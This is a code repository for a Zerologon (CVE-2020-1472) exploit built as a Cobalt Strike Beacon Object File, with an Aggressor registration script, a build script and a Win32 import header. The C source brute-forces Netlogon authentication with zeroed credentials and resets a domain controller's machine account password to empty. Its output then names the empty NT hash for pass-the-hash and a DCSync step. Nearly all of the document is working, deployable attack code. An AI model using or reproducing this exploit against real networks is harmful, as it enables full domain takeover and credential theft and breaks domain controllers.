├── LICENSE ├── dist ├── zerologon.cna ├── zerologon.x64.o └── zerologon.x86.o ├── make.bat └── src ├── beacon.h └── zerologon.c /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Raphael Mudge 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /dist/zerologon.cna: -------------------------------------------------------------------------------- 1 | alias zerologon { 2 | local('$bid $barch $fqdn $netbios $args $safew'); 3 | ($bid, $safew, $fqdn) = @_; 4 | $netbios = split("\\.", $fqdn)[0]; 5 | 6 | # figure out the arch of this session 7 | $barch = barch($1); 8 | 9 | # read in the right BOF file 10 | $handle = openf(script_resource("zerologon. $+ $barch $+ .o")); 11 | $data = readb($handle, -1); 12 | closef($handle); 13 | 14 | # build our arguments 15 | $args = bof_pack($1, "ZZZ", $fqdn, $netbios, $netbios . '$'); 16 | 17 | # safety check. 18 | if ($safew ne "iunderstand") { 19 | berror($1, "zerologon aborted! Type help zerologon and read first."); 20 | return; 21 | } 22 | 23 | # announce what we're doing 24 | btask($1, "Reset $netbios $+ \$ machine account via CVE-2020-1472"); 25 | 26 | # execute it. 27 | beacon_inline_execute($1, $data, "go", $args); 28 | } 29 | 30 | beacon_command_register( 31 | "zerologon", 32 | "Reset DC machine account password with CVE-2020-1472", 33 | "Synopsis: zerologon [safeword] [DC.fqdn]\n\nReset the machine account password for a domain controller with the\nZerologon exploit. \n\nThis exploit will break the functionality of this domain controller.\n\c4Don't use in production.\o Use \c0iunderstand\o as the safe word parameter\nto acknowledge that you read this."); 34 | -------------------------------------------------------------------------------- /dist/zerologon.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cobalt-Strike/ZeroLogon-BOF/d080131331897c388a189d4aa76283afdd727617/dist/zerologon.x64.o -------------------------------------------------------------------------------- /dist/zerologon.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cobalt-Strike/ZeroLogon-BOF/d080131331897c388a189d4aa76283afdd727617/dist/zerologon.x86.o -------------------------------------------------------------------------------- /make.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set PLAT="x86" 3 | IF "%Platform%"=="x64" set PLAT="x64" 4 | 5 | cl.exe /GS- /c src/zerologon.c /Fodist/zerologon.%PLAT%.o 6 | -------------------------------------------------------------------------------- /src/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | */ 7 | 8 | /* data API */ 9 | typedef struct { 10 | char * original; /* the original buffer [so we can free it] */ 11 | char * buffer; /* current pointer into our buffer */ 12 | int length; /* remaining length of data */ 13 | int size; /* total size of this buffer */ 14 | } datap; 15 | 16 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 17 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 18 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 19 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 20 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 21 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 22 | 23 | /* format API */ 24 | typedef struct { 25 | char * original; /* the original buffer [so we can free it] */ 26 | char * buffer; /* current pointer into our buffer */ 27 | int length; /* remaining length of data */ 28 | int size; /* total size of this buffer */ 29 | } formatp; 30 | 31 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 32 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 33 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 35 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 36 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 37 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 38 | 39 | /* Output Functions */ 40 | #define CALLBACK_OUTPUT 0x0 41 | #define CALLBACK_PENDING 0x16 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | DECLSPEC_IMPORT void BeaconErrorD(int msg, int arg); 49 | DECLSPEC_IMPORT void BeaconErrorDD(int msg, int arg, int arg2); 50 | DECLSPEC_IMPORT void BeaconErrorNA(int msg); 51 | DECLSPEC_IMPORT void BeaconDebug(char * fmt, ...); 52 | 53 | /* Token Functions */ 54 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 55 | DECLSPEC_IMPORT void BeaconRevertToken(); 56 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 57 | 58 | /* Spawn+Inject Functions */ 59 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 60 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 61 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 62 | 63 | /* Utility Functions */ 64 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 65 | 66 | /* Spawn and Inject */ 67 | //DECLSPEC_IMPORT void BeaconSpawnJob(int type, int wait, int offset, char * payload, int payload_length, char * argument, int argument_length, char * description, int description_length, BOOL x86, BOOL ignoreToken); 68 | //DECLSPEC_IMPORT void BeaconInject(HANDLE handle, char * shellcode, int shellcode_length, int shellcode_offset, char * arguments, int argument_length); 69 | 70 | /* Execute Programs */ 71 | //DECLSPEC_IMPORT BOOL BeaconExecute(char * command, int commandlength, STARTUPINFO * si, PROCESS_INFORMATION * pi, DWORD flags, BOOL ignoreToken); 72 | //DECLSPEC_IMPORT void BeaconExecuteCleanup(PROCESS_INFORMATION * pi); 73 | 74 | /* Job related APIs */ 75 | //DECLSPEC_IMPORT void BeaconWatchHandle(HANDLE readme, DWORD pid, DWORD type, char * description); 76 | //DECLSPEC_IMPORT void BeaconWatchPipe(char * pipe, DWORD pid, DWORD type, char * description); 77 | 78 | /* Win32 APIs */ 79 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID *pSid); 80 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CheckTokenMembership(HANDLE hToken, PSID pSid, PBOOL isMember); 81 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject); 82 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR, LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION); 83 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CreateRestrictedToken(HANDLE, DWORD, DWORD, PSID_AND_ATTRIBUTES, DWORD, PLUID_AND_ATTRIBUTES, DWORD, PSID_AND_ATTRIBUTES, PHANDLE); 84 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, LPCSTR lpDisplayName, DWORD dwDesiredAccess, DWORD dwServiceType, DWORD dwStartType, DWORD dwErrorControl, LPCSTR lpBinaryPathName, LPCSTR lpLoadOrderGroup, LPDWORD lpdwTagId, LPCSTR lpDependencies, LPCSTR lpServiceStartName, LPCSTR lpPassword); 85 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService); 86 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE, DWORD, LPSECURITY_ATTRIBUTES, SECURITY_IMPERSONATION_LEVEL, TOKEN_TYPE, PHANDLE); 87 | DECLSPEC_IMPORT PVOID WINAPI ADVAPI32$FreeSid(PSID pSid); 88 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD); 89 | DECLSPEC_IMPORT PDWORD WINAPI ADVAPI32$GetSidSubAuthority(PSID, DWORD); 90 | DECLSPEC_IMPORT PUCHAR WINAPI ADVAPI32$GetSidSubAuthorityCount(PSID); 91 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE); 92 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupAccountSidA(LPCSTR, PSID, LPSTR, LPDWORD, LPSTR, LPDWORD, PSID_NAME_USE); 93 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE, DWORD, PHANDLE); 94 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess); 95 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService, LPSERVICE_STATUS lpServiceStatus); 96 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumKeyA(HKEY hKey, DWORD dwIndex, LPSTR lpName, DWORD cchName); 97 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumValueA(HKEY hKey, DWORD dwIndex, LPSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData); 98 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenCurrentUser(REGSAM samDesired, PHKEY phkResult); 99 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY, LPCSTR, DWORD, REGSAM, PHKEY); 100 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegQueryValueExA(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD); 101 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCloseKey(HKEY); 102 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$RevertToSelf(); 103 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD); 104 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors); 105 | 106 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE); 107 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 108 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 109 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD, DWORD); 110 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$DuplicateHandle(HANDLE, HANDLE, HANDLE, LPHANDLE, DWORD, BOOL, DWORD); 111 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentDirectoryW(DWORD, LPWSTR); 112 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime); 113 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetModuleFileNameA(HMODULE, LPSTR, DWORD); 114 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(); 115 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentProcessId(); 116 | DECLSPEC_IMPORT UINT WINAPI KERNEL32$GetSystemWindowsDirectoryA(LPSTR, UINT); 117 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(); 118 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE); 119 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(); 120 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T); 121 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL); 122 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); 123 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32First(HANDLE, void *); 124 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32Next(HANDLE, void *); 125 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ProcessIdToSessionId(DWORD, DWORD *); 126 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesRead); 127 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileTime(HANDLE hFile, CONST FILETIME *lpCreationTime, CONST FILETIME *lpLastAccessTime, CONST FILETIME *lpLastWriteTime); 128 | DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD); 129 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$TerminateProcess(HANDLE, UINT); 130 | DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 131 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE, DWORD); 132 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten); 133 | 134 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 135 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); 136 | 137 | typedef enum _OBJECT_INFORMATION_CLASS { 138 | ObjectBasicInformation, ObjectNameInformation, ObjectTypeInformation, ObjectAllTypesInformation, ObjectHandleInformation 139 | } OBJECT_INFORMATION_CLASS; 140 | 141 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtDuplicateObject(HANDLE, HANDLE *, HANDLE, HANDLE *, ACCESS_MASK, BOOLEAN, ULONG); 142 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQueryObject(HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG); 143 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 144 | DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$RtlAdjustPrivilege(ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG pPreviousState); 145 | DECLSPEC_IMPORT BOOLEAN NTAPI NTDLL$RtlEqualUnicodeString(void *, void *, BOOLEAN); 146 | DECLSPEC_IMPORT VOID NTAPI NTDLL$RtlInitUnicodeString(PUNICODE_STRING, PCWSTR); 147 | 148 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(wchar_t * lpsz, LPCLSID pclsid); 149 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoGetObject(wchar_t *, BIND_OPTS *, REFIID, void **ppv); 150 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); 151 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(wchar_t * lpsz, LPIID lpiid); 152 | 153 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaCallAuthenticationPackage(HANDLE, ULONG, PVOID, ULONG, PVOID, PULONG, PNTSTATUS); 154 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaConnectUntrusted(PHANDLE); 155 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaDeregisterLogonProcess(HANDLE); 156 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaLookupAuthenticationPackage(HANDLE, void *, PULONG); 157 | 158 | DECLSPEC_IMPORT BOOL WINAPI SHELL32$ShellExecuteExA(LPSHELLEXECUTEINFOA); 159 | -------------------------------------------------------------------------------- /src/zerologon.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Port of SharpZeroLogon to a Beacon Object File 3 | * https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include "beacon.h" 10 | 11 | typedef struct _NETLOGON_CREDENTIAL { 12 | CHAR data[8]; 13 | } NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL; 14 | 15 | typedef struct _NETLOGON_AUTHENTICATOR { 16 | NETLOGON_CREDENTIAL Credential; 17 | DWORD Timestamp; 18 | } NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR; 19 | 20 | typedef enum _NETLOGON_SECURE_CHANNEL_TYPE{ 21 | NullSecureChannel = 0, 22 | MsvApSecureChannel = 1, 23 | WorkstationSecureChannel = 2, 24 | TrustedDnsDomainSecureChannel = 3, 25 | TrustedDomainSecureChannel = 4, 26 | UasServerSecureChannel = 5, 27 | ServerSecureChannel = 6, 28 | CdcServerSecureChannel = 7 29 | } NETLOGON_SECURE_CHANNEL_TYPE; 30 | 31 | typedef struct _NL_TRUST_PASSWORD { 32 | WCHAR Buffer[256]; 33 | ULONG Length; 34 | } NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD; 35 | 36 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerReqChallenge(LPWSTR PrimaryName, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientChallenge, PNETLOGON_CREDENTIAL ServerChallenge); 37 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerAuthenticate2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientCredential, PNETLOGON_CREDENTIAL ServerCredential, PULONG NegotiatedFlags); 38 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerPasswordSet2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_AUTHENTICATOR Authenticator, PNETLOGON_AUTHENTICATOR ReturnAuthenticator, PNL_TRUST_PASSWORD ClearNewPassword); 39 | 40 | void go(char * args, int alen) { 41 | DWORD i; 42 | NETLOGON_CREDENTIAL ClientCh = {0}; 43 | NETLOGON_CREDENTIAL ServerCh = {0}; 44 | NETLOGON_AUTHENTICATOR Auth = {0}; 45 | NETLOGON_AUTHENTICATOR AuthRet = {0}; 46 | NL_TRUST_PASSWORD NewPass = {0}; 47 | ULONG NegotiateFlags = 0x212fffff; 48 | 49 | datap parser; 50 | wchar_t * dc_fqdn; /* DC.corp.acme.com */ 51 | wchar_t * dc_netbios; /* DC */ 52 | wchar_t * dc_account; /* DC$ */ 53 | 54 | /* extract our arguments */ 55 | BeaconDataParse(&parser, args, alen); 56 | dc_fqdn = (wchar_t *)BeaconDataExtract(&parser, NULL); 57 | dc_netbios = (wchar_t *)BeaconDataExtract(&parser, NULL); 58 | dc_account = (wchar_t *)BeaconDataExtract(&parser, NULL); 59 | 60 | for (i = 0; i < 2000; i++) { 61 | NETAPI32$I_NetServerReqChallenge(dc_fqdn, dc_netbios, &ClientCh, &ServerCh); 62 | if ((NETAPI32$I_NetServerAuthenticate2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &ClientCh, &ServerCh, &NegotiateFlags) == 0)) { 63 | if (NETAPI32$I_NetServerPasswordSet2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &Auth, &AuthRet, &NewPass) == 0) { 64 | BeaconPrintf(CALLBACK_OUTPUT, "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync", dc_account); 65 | } 66 | else { 67 | BeaconPrintf(CALLBACK_ERROR, "Failed to set machine account pass for %S", dc_account); 68 | } 69 | 70 | return; 71 | } 72 | } 73 | 74 | BeaconPrintf(CALLBACK_ERROR, "%S is not vulnerable", dc_fqdn); 75 | } 76 | --------------------------------------------------------------------------------